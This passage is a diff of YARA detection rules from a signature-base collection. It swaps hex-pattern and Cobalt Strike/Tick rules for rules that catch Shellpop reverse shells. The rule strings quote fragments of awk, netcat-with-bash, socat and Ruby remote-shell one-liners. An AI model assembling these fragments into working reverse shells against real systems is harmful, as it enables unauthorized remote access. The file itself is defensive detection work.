-		$s166 = { A6 A7 A6 A7 A6 A4 ?? ?? A6 A4 A6 A7 A6 A4 ?? ?? A6 A5 A6 A4 A6 A2 ?? ?? ?? ?? A6 A2 A6 A4 A6 A2 ?? ?? ?? ?? A6 A3 A6 A7 A6 A4 ?? ?? }
-		$s167 = { A7 A6 A7 A6 A7 A5 ?? ?? A7 A5 A7 A6 A7 A5 ?? ?? A7 A4 A7 A5 A7 A3 ?? ?? ?? ?? A7 A3 A7 A5 A7 A3 ?? ?? ?? ?? A7 A2 A7 A6 A7 A5 ?? ?? }
-		$s168 = { A8 A9 A8 A9 A8 AA ?? ?? A8 AA A8 A9 A8 AA ?? ?? A8 AB A8 AA A8 AC ?? ?? ?? ?? A8 AC A8 AA A8 AC ?? ?? ?? ?? A8 AD A8 A9 A8 AA ?? ?? }
-		$s169 = { A9 A8 A9 A8 A9 AB ?? ?? A9 AB A9 A8 A9 AB ?? ?? A9 AA A9 AB A9 AD ?? ?? ?? ?? A9 AD A9 AB A9 AD ?? ?? ?? ?? A9 AC A9 A8 A9 AB ?? ?? }
-		$s170 = { AA AB AA AB AA A8 ?? ?? AA A8 AA AB AA A8 ?? ?? AA A9 AA A8 AA AE ?? ?? ?? ?? AA AE AA A8 AA AE ?? ?? ?? ?? AA AF AA AB AA A8 ?? ?? }
-		$s171 = { AB AA AB AA AB A9 ?? ?? AB A9 AB AA AB A9 ?? ?? AB A8 AB A9 AB AF ?? ?? ?? ?? AB AF AB A9 AB AF ?? ?? ?? ?? AB AE AB AA AB A9 ?? ?? }
-		$s172 = { AC AD AC AD AC AE ?? ?? AC AE AC AD AC AE ?? ?? AC AF AC AE AC A8 ?? ?? ?? ?? AC A8 AC AE AC A8 ?? ?? ?? ?? AC A9 AC AD AC AE ?? ?? }
-		$s173 = { AD AC AD AC AD AF ?? ?? AD AF AD AC AD AF ?? ?? AD AE AD AF AD A9 ?? ?? ?? ?? AD A9 AD AF AD A9 ?? ?? ?? ?? AD A8 AD AC AD AF ?? ?? }
-		$s174 = { AE AF AE AF AE AC ?? ?? AE AC AE AF AE AC ?? ?? AE AD AE AC AE AA ?? ?? ?? ?? AE AA AE AC AE AA ?? ?? ?? ?? AE AB AE AF AE AC ?? ?? }
-		$s175 = { AF AE AF AE AF AD ?? ?? AF AD AF AE AF AD ?? ?? AF AC AF AD AF AB ?? ?? ?? ?? AF AB AF AD AF AB ?? ?? ?? ?? AF AA AF AE AF AD ?? ?? }
-		$s176 = { B0 B1 B0 B1 B0 B2 ?? ?? B0 B2 B0 B1 B0 B2 ?? ?? B0 B3 B0 B2 B0 B4 ?? ?? ?? ?? B0 B4 B0 B2 B0 B4 ?? ?? ?? ?? B0 B5 B0 B1 B0 B2 ?? ?? }
-		$s177 = { B1 B0 B1 B0 B1 B3 ?? ?? B1 B3 B1 B0 B1 B3 ?? ?? B1 B2 B1 B3 B1 B5 ?? ?? ?? ?? B1 B5 B1 B3 B1 B5 ?? ?? ?? ?? B1 B4 B1 B0 B1 B3 ?? ?? }
-		$s178 = { B2 B3 B2 B3 B2 B0 ?? ?? B2 B0 B2 B3 B2 B0 ?? ?? B2 B1 B2 B0 B2 B6 ?? ?? ?? ?? B2 B6 B2 B0 B2 B6 ?? ?? ?? ?? B2 B7 B2 B3 B2 B0 ?? ?? }
-		$s179 = { B3 B2 B3 B2 B3 B1 ?? ?? B3 B1 B3 B2 B3 B1 ?? ?? B3 B0 B3 B1 B3 B7 ?? ?? ?? ?? B3 B7 B3 B1 B3 B7 ?? ?? ?? ?? B3 B6 B3 B2 B3 B1 ?? ?? }
-		$s180 = { B4 B5 B4 B5 B4 B6 ?? ?? B4 B6 B4 B5 B4 B6 ?? ?? B4 B7 B4 B6 B4 B0 ?? ?? ?? ?? B4 B0 B4 B6 B4 B0 ?? ?? ?? ?? B4 B1 B4 B5 B4 B6 ?? ?? }
-		$s181 = { B5 B4 B5 B4 B5 B7 ?? ?? B5 B7 B5 B4 B5 B7 ?? ?? B5 B6 B5 B7 B5 B1 ?? ?? ?? ?? B5 B1 B5 B7 B5 B1 ?? ?? ?? ?? B5 B0 B5 B4 B5 B7 ?? ?? }
-		$s182 = { B6 B7 B6 B7 B6 B4 ?? ?? B6 B4 B6 B7 B6 B4 ?? ?? B6 B5 B6 B4 B6 B2 ?? ?? ?? ?? B6 B2 B6 B4 B6 B2 ?? ?? ?? ?? B6 B3 B6 B7 B6 B4 ?? ?? }
-		$s183 = { B7 B6 B7 B6 B7 B5 ?? ?? B7 B5 B7 B6 B7 B5 ?? ?? B7 B4 B7 B5 B7 B3 ?? ?? ?? ?? B7 B3 B7 B5 B7 B3 ?? ?? ?? ?? B7 B2 B7 B6 B7 B5 ?? ?? }
-		$s184 = { B8 B9 B8 B9 B8 BA ?? ?? B8 BA B8 B9 B8 BA ?? ?? B8 BB B8 BA B8 BC ?? ?? ?? ?? B8 BC B8 BA B8 BC ?? ?? ?? ?? B8 BD B8 B9 B8 BA ?? ?? }
-		$s185 = { B9 B8 B9 B8 B9 BB ?? ?? B9 BB B9 B8 B9 BB ?? ?? B9 BA B9 BB B9 BD ?? ?? ?? ?? B9 BD B9 BB B9 BD ?? ?? ?? ?? B9 BC B9 B8 B9 BB ?? ?? }
-		$s186 = { BA BB BA BB BA B8 ?? ?? BA B8 BA BB BA B8 ?? ?? BA B9 BA B8 BA BE ?? ?? ?? ?? BA BE BA B8 BA BE ?? ?? ?? ?? BA BF BA BB BA B8 ?? ?? }
-		$s187 = { BB BA BB BA BB B9 ?? ?? BB B9 BB BA BB B9 ?? ?? BB B8 BB B9 BB BF ?? ?? ?? ?? BB BF BB B9 BB BF ?? ?? ?? ?? BB BE BB BA BB B9 ?? ?? }
-		$s188 = { BC BD BC BD BC BE ?? ?? BC BE BC BD BC BE ?? ?? BC BF BC BE BC B8 ?? ?? ?? ?? BC B8 BC BE BC B8 ?? ?? ?? ?? BC B9 BC BD BC BE ?? ?? }
-		$s189 = { BD BC BD BC BD BF ?? ?? BD BF BD BC BD BF ?? ?? BD BE BD BF BD B9 ?? ?? ?? ?? BD B9 BD BF BD B9 ?? ?? ?? ?? BD B8 BD BC BD BF ?? ?? }
-		$s190 = { BE BF BE BF BE BC ?? ?? BE BC BE BF BE BC ?? ?? BE BD BE BC BE BA ?? ?? ?? ?? BE BA BE BC BE BA ?? ?? ?? ?? BE BB BE BF BE BC ?? ?? }
-		$s191 = { BF BE BF BE BF BD ?? ?? BF BD BF BE BF BD ?? ?? BF BC BF BD BF BB ?? ?? ?? ?? BF BB BF BD BF BB ?? ?? ?? ?? BF BA BF BE BF BD ?? ?? }
-		$s192 = { C0 C1 C0 C1 C0 C2 ?? ?? C0 C2 C0 C1 C0 C2 ?? ?? C0 C3 C0 C2 C0 C4 ?? ?? ?? ?? C0 C4 C0 C2 C0 C4 ?? ?? ?? ?? C0 C5 C0 C1 C0 C2 ?? ?? }
-		$s193 = { C1 C0 C1 C0 C1 C3 ?? ?? C1 C3 C1 C0 C1 C3 ?? ?? C1 C2 C1 C3 C1 C5 ?? ?? ?? ?? C1 C5 C1 C3 C1 C5 ?? ?? ?? ?? C1 C4 C1 C0 C1 C3 ?? ?? }
-		$s194 = { C2 C3 C2 C3 C2 C0 ?? ?? C2 C0 C2 C3 C2 C0 ?? ?? C2 C1 C2 C0 C2 C6 ?? ?? ?? ?? C2 C6 C2 C0 C2 C6 ?? ?? ?? ?? C2 C7 C2 C3 C2 C0 ?? ?? }
-		$s195 = { C3 C2 C3 C2 C3 C1 ?? ?? C3 C1 C3 C2 C3 C1 ?? ?? C3 C0 C3 C1 C3 C7 ?? ?? ?? ?? C3 C7 C3 C1 C3 C7 ?? ?? ?? ?? C3 C6 C3 C2 C3 C1 ?? ?? }
-		$s196 = { C4 C5 C4 C5 C4 C6 ?? ?? C4 C6 C4 C5 C4 C6 ?? ?? C4 C7 C4 C6 C4 C0 ?? ?? ?? ?? C4 C0 C4 C6 C4 C0 ?? ?? ?? ?? C4 C1 C4 C5 C4 C6 ?? ?? }
-		$s197 = { C5 C4 C5 C4 C5 C7 ?? ?? C5 C7 C5 C4 C5 C7 ?? ?? C5 C6 C5 C7 C5 C1 ?? ?? ?? ?? C5 C1 C5 C7 C5 C1 ?? ?? ?? ?? C5 C0 C5 C4 C5 C7 ?? ?? }
-		$s198 = { C6 C7 C6 C7 C6 C4 ?? ?? C6 C4 C6 C7 C6 C4 ?? ?? C6 C5 C6 C4 C6 C2 ?? ?? ?? ?? C6 C2 C6 C4 C6 C2 ?? ?? ?? ?? C6 C3 C6 C7 C6 C4 ?? ?? }
-		$s199 = { C7 C6 C7 C6 C7 C5 ?? ?? C7 C5 C7 C6 C7 C5 ?? ?? C7 C4 C7 C5 C7 C3 ?? ?? ?? ?? C7 C3 C7 C5 C7 C3 ?? ?? ?? ?? C7 C2 C7 C6 C7 C5 ?? ?? }
-		$s200 = { C8 C9 C8 C9 C8 CA ?? ?? C8 CA C8 C9 C8 CA ?? ?? C8 CB C8 CA C8 CC ?? ?? ?? ?? C8 CC C8 CA C8 CC ?? ?? ?? ?? C8 CD C8 C9 C8 CA ?? ?? }
-		$s201 = { C9 C8 C9 C8 C9 CB ?? ?? C9 CB C9 C8 C9 CB ?? ?? C9 CA C9 CB C9 CD ?? ?? ?? ?? C9 CD C9 CB C9 CD ?? ?? ?? ?? C9 CC C9 C8 C9 CB ?? ?? }
-		$s202 = { CA CB CA CB CA C8 ?? ?? CA C8 CA CB CA C8 ?? ?? CA C9 CA C8 CA CE ?? ?? ?? ?? CA CE CA C8 CA CE ?? ?? ?? ?? CA CF CA CB CA C8 ?? ?? }
-		$s203 = { CB CA CB CA CB C9 ?? ?? CB C9 CB CA CB C9 ?? ?? CB C8 CB C9 CB CF ?? ?? ?? ?? CB CF CB C9 CB CF ?? ?? ?? ?? CB CE CB CA CB C9 ?? ?? }
-		$s204 = { CC CD CC CD CC CE ?? ?? CC CE CC CD CC CE ?? ?? CC CF CC CE CC C8 ?? ?? ?? ?? CC C8 CC CE CC C8 ?? ?? ?? ?? CC C9 CC CD CC CE ?? ?? }
-		$s205 = { CD CC CD CC CD CF ?? ?? CD CF CD CC CD CF ?? ?? CD CE CD CF CD C9 ?? ?? ?? ?? CD C9 CD CF CD C9 ?? ?? ?? ?? CD C8 CD CC CD CF ?? ?? }
-		$s206 = { CE CF CE CF CE CC ?? ?? CE CC CE CF CE CC ?? ?? CE CD CE CC CE CA ?? ?? ?? ?? CE CA CE CC CE CA ?? ?? ?? ?? CE CB CE CF CE CC ?? ?? }
-		$s207 = { CF CE CF CE CF CD ?? ?? CF CD CF CE CF CD ?? ?? CF CC CF CD CF CB ?? ?? ?? ?? CF CB CF CD CF CB ?? ?? ?? ?? CF CA CF CE CF CD ?? ?? }
-		$s208 = { D0 D1 D0 D1 D0 D2 ?? ?? D0 D2 D0 D1 D0 D2 ?? ?? D0 D3 D0 D2 D0 D4 ?? ?? ?? ?? D0 D4 D0 D2 D0 D4 ?? ?? ?? ?? D0 D5 D0 D1 D0 D2 ?? ?? }
-		$s209 = { D1 D0 D1 D0 D1 D3 ?? ?? D1 D3 D1 D0 D1 D3 ?? ?? D1 D2 D1 D3 D1 D5 ?? ?? ?? ?? D1 D5 D1 D3 D1 D5 ?? ?? ?? ?? D1 D4 D1 D0 D1 D3 ?? ?? }
-		$s210 = { D2 D3 D2 D3 D2 D0 ?? ?? D2 D0 D2 D3 D2 D0 ?? ?? D2 D1 D2 D0 D2 D6 ?? ?? ?? ?? D2 D6 D2 D0 D2 D6 ?? ?? ?? ?? D2 D7 D2 D3 D2 D0 ?? ?? }
-		$s211 = { D3 D2 D3 D2 D3 D1 ?? ?? D3 D1 D3 D2 D3 D1 ?? ?? D3 D0 D3 D1 D3 D7 ?? ?? ?? ?? D3 D7 D3 D1 D3 D7 ?? ?? ?? ?? D3 D6 D3 D2 D3 D1 ?? ?? }
-		$s212 = { D4 D5 D4 D5 D4 D6 ?? ?? D4 D6 D4 D5 D4 D6 ?? ?? D4 D7 D4 D6 D4 D0 ?? ?? ?? ?? D4 D0 D4 D6 D4 D0 ?? ?? ?? ?? D4 D1 D4 D5 D4 D6 ?? ?? }
-		$s213 = { D5 D4 D5 D4 D5 D7 ?? ?? D5 D7 D5 D4 D5 D7 ?? ?? D5 D6 D5 D7 D5 D1 ?? ?? ?? ?? D5 D1 D5 D7 D5 D1 ?? ?? ?? ?? D5 D0 D5 D4 D5 D7 ?? ?? }
-		$s214 = { D6 D7 D6 D7 D6 D4 ?? ?? D6 D4 D6 D7 D6 D4 ?? ?? D6 D5 D6 D4 D6 D2 ?? ?? ?? ?? D6 D2 D6 D4 D6 D2 ?? ?? ?? ?? D6 D3 D6 D7 D6 D4 ?? ?? }
-		$s215 = { D7 D6 D7 D6 D7 D5 ?? ?? D7 D5 D7 D6 D7 D5 ?? ?? D7 D4 D7 D5 D7 D3 ?? ?? ?? ?? D7 D3 D7 D5 D7 D3 ?? ?? ?? ?? D7 D2 D7 D6 D7 D5 ?? ?? }
-		$s216 = { D8 D9 D8 D9 D8 DA ?? ?? D8 DA D8 D9 D8 DA ?? ?? D8 DB D8 DA D8 DC ?? ?? ?? ?? D8 DC D8 DA D8 DC ?? ?? ?? ?? D8 DD D8 D9 D8 DA ?? ?? }
-		$s217 = { D9 D8 D9 D8 D9 DB ?? ?? D9 DB D9 D8 D9 DB ?? ?? D9 DA D9 DB D9 DD ?? ?? ?? ?? D9 DD D9 DB D9 DD ?? ?? ?? ?? D9 DC D9 D8 D9 DB ?? ?? }
-		$s218 = { DA DB DA DB DA D8 ?? ?? DA D8 DA DB DA D8 ?? ?? DA D9 DA D8 DA DE ?? ?? ?? ?? DA DE DA D8 DA DE ?? ?? ?? ?? DA DF DA DB DA D8 ?? ?? }
-		$s219 = { DB DA DB DA DB D9 ?? ?? DB D9 DB DA DB D9 ?? ?? DB D8 DB D9 DB DF ?? ?? ?? ?? DB DF DB D9 DB DF ?? ?? ?? ?? DB DE DB DA DB D9 ?? ?? }
-		$s220 = { DC DD DC DD DC DE ?? ?? DC DE DC DD DC DE ?? ?? DC DF DC DE DC D8 ?? ?? ?? ?? DC D8 DC DE DC D8 ?? ?? ?? ?? DC D9 DC DD DC DE ?? ?? }
-		$s221 = { DD DC DD DC DD DF ?? ?? DD DF DD DC DD DF ?? ?? DD DE DD DF DD D9 ?? ?? ?? ?? DD D9 DD DF DD D9 ?? ?? ?? ?? DD D8 DD DC DD DF ?? ?? }
-		$s222 = { DE DF DE DF DE DC ?? ?? DE DC DE DF DE DC ?? ?? DE DD DE DC DE DA ?? ?? ?? ?? DE DA DE DC DE DA ?? ?? ?? ?? DE DB DE DF DE DC ?? ?? }
-		$s223 = { DF DE DF DE DF DD ?? ?? DF DD DF DE DF DD ?? ?? DF DC DF DD DF DB ?? ?? ?? ?? DF DB DF DD DF DB ?? ?? ?? ?? DF DA DF DE DF DD ?? ?? }
-		$s224 = { E0 E1 E0 E1 E0 E2 ?? ?? E0 E2 E0 E1 E0 E2 ?? ?? E0 E3 E0 E2 E0 E4 ?? ?? ?? ?? E0 E4 E0 E2 E0 E4 ?? ?? ?? ?? E0 E5 E0 E1 E0 E2 ?? ?? }
-		$s225 = { E1 E0 E1 E0 E1 E3 ?? ?? E1 E3 E1 E0 E1 E3 ?? ?? E1 E2 E1 E3 E1 E5 ?? ?? ?? ?? E1 E5 E1 E3 E1 E5 ?? ?? ?? ?? E1 E4 E1 E0 E1 E3 ?? ?? }
-		$s226 = { E2 E3 E2 E3 E2 E0 ?? ?? E2 E0 E2 E3 E2 E0 ?? ?? E2 E1 E2 E0 E2 E6 ?? ?? ?? ?? E2 E6 E2 E0 E2 E6 ?? ?? ?? ?? E2 E7 E2 E3 E2 E0 ?? ?? }
-		$s227 = { E3 E2 E3 E2 E3 E1 ?? ?? E3 E1 E3 E2 E3 E1 ?? ?? E3 E0 E3 E1 E3 E7 ?? ?? ?? ?? E3 E7 E3 E1 E3 E7 ?? ?? ?? ?? E3 E6 E3 E2 E3 E1 ?? ?? }
-		$s228 = { E4 E5 E4 E5 E4 E6 ?? ?? E4 E6 E4 E5 E4 E6 ?? ?? E4 E7 E4 E6 E4 E0 ?? ?? ?? ?? E4 E0 E4 E6 E4 E0 ?? ?? ?? ?? E4 E1 E4 E5 E4 E6 ?? ?? }
-		$s229 = { E5 E4 E5 E4 E5 E7 ?? ?? E5 E7 E5 E4 E5 E7 ?? ?? E5 E6 E5 E7 E5 E1 ?? ?? ?? ?? E5 E1 E5 E7 E5 E1 ?? ?? ?? ?? E5 E0 E5 E4 E5 E7 ?? ?? }
-		$s230 = { E6 E7 E6 E7 E6 E4 ?? ?? E6 E4 E6 E7 E6 E4 ?? ?? E6 E5 E6 E4 E6 E2 ?? ?? ?? ?? E6 E2 E6 E4 E6 E2 ?? ?? ?? ?? E6 E3 E6 E7 E6 E4 ?? ?? }
-		$s231 = { E7 E6 E7 E6 E7 E5 ?? ?? E7 E5 E7 E6 E7 E5 ?? ?? E7 E4 E7 E5 E7 E3 ?? ?? ?? ?? E7 E3 E7 E5 E7 E3 ?? ?? ?? ?? E7 E2 E7 E6 E7 E5 ?? ?? }
-		$s232 = { E8 E9 E8 E9 E8 EA ?? ?? E8 EA E8 E9 E8 EA ?? ?? E8 EB E8 EA E8 EC ?? ?? ?? ?? E8 EC E8 EA E8 EC ?? ?? ?? ?? E8 ED E8 E9 E8 EA ?? ?? }
-		$s233 = { E9 E8 E9 E8 E9 EB ?? ?? E9 EB E9 E8 E9 EB ?? ?? E9 EA E9 EB E9 ED ?? ?? ?? ?? E9 ED E9 EB E9 ED ?? ?? ?? ?? E9 EC E9 E8 E9 EB ?? ?? }
-		$s234 = { EA EB EA EB EA E8 ?? ?? EA E8 EA EB EA E8 ?? ?? EA E9 EA E8 EA EE ?? ?? ?? ?? EA EE EA E8 EA EE ?? ?? ?? ?? EA EF EA EB EA E8 ?? ?? }
-		$s235 = { EB EA EB EA EB E9 ?? ?? EB E9 EB EA EB E9 ?? ?? EB E8 EB E9 EB EF ?? ?? ?? ?? EB EF EB E9 EB EF ?? ?? ?? ?? EB EE EB EA EB E9 ?? ?? }
-		$s236 = { EC ED EC ED EC EE ?? ?? EC EE EC ED EC EE ?? ?? EC EF EC EE EC E8 ?? ?? ?? ?? EC E8 EC EE EC E8 ?? ?? ?? ?? EC E9 EC ED EC EE ?? ?? }
-		$s237 = { ED EC ED EC ED EF ?? ?? ED EF ED EC ED EF ?? ?? ED EE ED EF ED E9 ?? ?? ?? ?? ED E9 ED EF ED E9 ?? ?? ?? ?? ED E8 ED EC ED EF ?? ?? }
-		$s238 = { EE EF EE EF EE EC ?? ?? EE EC EE EF EE EC ?? ?? EE ED EE EC EE EA ?? ?? ?? ?? EE EA EE EC EE EA ?? ?? ?? ?? EE EB EE EF EE EC ?? ?? }
-		$s239 = { EF EE EF EE EF ED ?? ?? EF ED EF EE EF ED ?? ?? EF EC EF ED EF EB ?? ?? ?? ?? EF EB EF ED EF EB ?? ?? ?? ?? EF EA EF EE EF ED ?? ?? }
-		$s240 = { F0 F1 F0 F1 F0 F2 ?? ?? F0 F2 F0 F1 F0 F2 ?? ?? F0 F3 F0 F2 F0 F4 ?? ?? ?? ?? F0 F4 F0 F2 F0 F4 ?? ?? ?? ?? F0 F5 F0 F1 F0 F2 ?? ?? }
-		$s241 = { F1 F0 F1 F0 F1 F3 ?? ?? F1 F3 F1 F0 F1 F3 ?? ?? F1 F2 F1 F3 F1 F5 ?? ?? ?? ?? F1 F5 F1 F3 F1 F5 ?? ?? ?? ?? F1 F4 F1 F0 F1 F3 ?? ?? }
-		$s242 = { F2 F3 F2 F3 F2 F0 ?? ?? F2 F0 F2 F3 F2 F0 ?? ?? F2 F1 F2 F0 F2 F6 ?? ?? ?? ?? F2 F6 F2 F0 F2 F6 ?? ?? ?? ?? F2 F7 F2 F3 F2 F0 ?? ?? }
-		$s243 = { F3 F2 F3 F2 F3 F1 ?? ?? F3 F1 F3 F2 F3 F1 ?? ?? F3 F0 F3 F1 F3 F7 ?? ?? ?? ?? F3 F7 F3 F1 F3 F7 ?? ?? ?? ?? F3 F6 F3 F2 F3 F1 ?? ?? }
-		$s244 = { F4 F5 F4 F5 F4 F6 ?? ?? F4 F6 F4 F5 F4 F6 ?? ?? F4 F7 F4 F6 F4 F0 ?? ?? ?? ?? F4 F0 F4 F6 F4 F0 ?? ?? ?? ?? F4 F1 F4 F5 F4 F6 ?? ?? }
-		$s245 = { F5 F4 F5 F4 F5 F7 ?? ?? F5 F7 F5 F4 F5 F7 ?? ?? F5 F6 F5 F7 F5 F1 ?? ?? ?? ?? F5 F1 F5 F7 F5 F1 ?? ?? ?? ?? F5 F0 F5 F4 F5 F7 ?? ?? }
-		$s246 = { F6 F7 F6 F7 F6 F4 ?? ?? F6 F4 F6 F7 F6 F4 ?? ?? F6 F5 F6 F4 F6 F2 ?? ?? ?? ?? F6 F2 F6 F4 F6 F2 ?? ?? ?? ?? F6 F3 F6 F7 F6 F4 ?? ?? }
-		$s247 = { F7 F6 F7 F6 F7 F5 ?? ?? F7 F5 F7 F6 F7 F5 ?? ?? F7 F4 F7 F5 F7 F3 ?? ?? ?? ?? F7 F3 F7 F5 F7 F3 ?? ?? ?? ?? F7 F2 F7 F6 F7 F5 ?? ?? }
-		$s248 = { F8 F9 F8 F9 F8 FA ?? ?? F8 FA F8 F9 F8 FA ?? ?? F8 FB F8 FA F8 FC ?? ?? ?? ?? F8 FC F8 FA F8 FC ?? ?? ?? ?? F8 FD F8 F9 F8 FA ?? ?? }
-		$s249 = { F9 F8 F9 F8 F9 FB ?? ?? F9 FB F9 F8 F9 FB ?? ?? F9 FA F9 FB F9 FD ?? ?? ?? ?? F9 FD F9 FB F9 FD ?? ?? ?? ?? F9 FC F9 F8 F9 FB ?? ?? }
-		$s250 = { FA FB FA FB FA F8 ?? ?? FA F8 FA FB FA F8 ?? ?? FA F9 FA F8 FA FE ?? ?? ?? ?? FA FE FA F8 FA FE ?? ?? ?? ?? FA FF FA FB FA F8 ?? ?? }
-		$s251 = { FB FA FB FA FB F9 ?? ?? FB F9 FB FA FB F9 ?? ?? FB F8 FB F9 FB FF ?? ?? ?? ?? FB FF FB F9 FB FF ?? ?? ?? ?? FB FE FB FA FB F9 ?? ?? }
-		$s252 = { FC FD FC FD FC FE ?? ?? FC FE FC FD FC FE ?? ?? FC FF FC FE FC F8 ?? ?? ?? ?? FC F8 FC FE FC F8 ?? ?? ?? ?? FC F9 FC FD FC FE ?? ?? }
-		$s253 = { FD FC FD FC FD FF ?? ?? FD FF FD FC FD FF ?? ?? FD FE FD FF FD F9 ?? ?? ?? ?? FD F9 FD FF FD F9 ?? ?? ?? ?? FD F8 FD FC FD FF ?? ?? }
-		$s254 = { FE FF FE FF FE FC ?? ?? FE FC FE FF FE FC ?? ?? FE FD FE FC FE FA ?? ?? ?? ?? FE FA FE FC FE FA ?? ?? ?? ?? FE FB FE FF FE FC ?? ?? }
-		$s255 = { FF FE FF FE FF FD ?? ?? FF FD FF FE FF FD ?? ?? FF FC FF FD FF FB ?? ?? ?? ?? FF FB FF FD FF FB ?? ?? ?? ?? FF FA FF FE FF FD ?? ?? }
-		$fp1 = "ICSharpCode.Decompiler" wide
+		$x1 = ");while(cmd=c.gets);IO.popen(cmd,'r'){" ascii
 
 	condition:
-		any of ( $s* ) and not 1 of ( $fp* )
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_MZ_Launcher
+rule SIGNATURE_BASE_HKTL_Shellpop_Awk : FILE
 {
 	meta:
-		description = "Detects CobaltStrike MZ header ReflectiveLoader launcher"
-		author = "yara@s3c.za.net"
-		id = "461a4741-11c5-53d9-b8e1-52d64cfe755b"
-		date = "2021-07-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L297-L307"
+		description = "Detects suspicious AWK Shellpop"
+		author = "Tobias Michalski"
+		id = "92d1e6dd-d758-5df2-b5e5-eb275964551d"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4265-L4278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa188546db138dffdcdbf6538367b5d5bc37638a2784b24b7fcd913c15e56072"
-		score = 75
+		logic_hash = "7d676ffbd1ce083a1b8e34576125fb0805caef4423089cd72a92483467669b78"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "7513a0a0ba786b0e22a9a7413491b4011f60af11253c596fa6857fb92a6736fc"
 
 	strings:
-		$mz_launcher = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D }
+		$s1 = "awk 'BEGIN {s = \"/inet/tcp/0/" ascii
+		$s2 = "; while(42) " ascii
 
 	condition:
-		$mz_launcher
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_Unmodifed_Beacon
+rule SIGNATURE_BASE_HKTL_Shellpop_Netcat_UDP : FILE
 {
 	meta:
-		description = "Detects unmodified CobaltStrike beacon DLL"
-		author = "yara@s3c.za.net"
-		id = "8eeb03f9-9698-5a46-b45b-224d5c3f3df7"
-		date = "2019-08-16"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L309-L320"
+		description = "Detects suspicious netcat popshell"
+		author = "Tobias Michalski"
+		id = "67aa53b6-00bc-5d2e-b6f3-37e9121cdd01"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4280-L4293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "10114a431fb70be8e18e67b22aa76bf2c0536f07d373f717c1dc51755e0847c9"
-		score = 75
+		logic_hash = "0c85b1275ccf5bbc7f6e0ab0f1fa9d1bce7d56912411f84f9946163191c79576"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "d823ad91b315c25893ce8627af285bcf4e161f9bbf7c070ee2565545084e88be"
 
 	strings:
-		$loader_export = "ReflectiveLoader"
-		$exportname = "beacon.dll"
+		$s1 = "mkfifo fifo ; nc.traditional -u" ascii
+		$s2 = "< fifo | { bash -i; } > fifo" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and 1 of them
 }
-
-rule SIGNATURE_BASE_APT_Tick_Sysmon_Loader_Jun18 : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Socat : FILE
 {
 	meta:
-		description = "Detects Sysmon Loader from Tick group incident - Weaponized USB"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eae013c3-4774-5342-bd1a-5f2825612747"
-		date = "2018-06-23"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tick_weaponized_usb.yar#L13-L38"
+		description = "Detects suspicious socat popshell"
+		author = "Tobias Michalski"
+		id = "23c331ba-217c-5b17-b45e-d553eea76a56"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4295-L4308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e6256269409322a4f48bfdaafc52f5ec83602cf66f2e3b8d83ed5175e1dc506f"
-		score = 75
+		logic_hash = "48c06096b27be11ae12cc38294acb495b739101cabc04e89eb76e93fb42c52df"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "31aea8630d5d2fcbb37a8e72fe4e096d0f2d8f05e03234645c69d7e8b59bb0e8"
+		hash1 = "267f69858a5490efb236628260b275ad4bbfeebf4a83fab8776e333ca706a6a0"
 
 	strings:
-		$x1 = "SysMonitor_3A2DCB47" fullword ascii
-		$s1 = "msxml.exe" fullword ascii
-		$s2 = "wins.log" fullword ascii
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
-		$s4 = "%2d-%2d-%2d-%2d" fullword ascii
-		$s5 = "%USERPROFILE%" fullword ascii
-		$s6 = "Windows NT" fullword ascii
-		$s7 = "device monitor" fullword ascii
-		$s8 = "\\Accessories" ascii
+		$s1 = "socat tcp-connect" ascii
+		$s2 = ",pty,stderr,setsid,sigint,sane" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "c5bb16e79fb500c430edce9481ae5b2b" or $x1 or 6 of them )
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_Tick_Homamdownloader_Jun18 : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Perl : FILE
 {
 	meta:
-		description = "Detects HomamDownloader from Tick group incident - Weaponized USB"
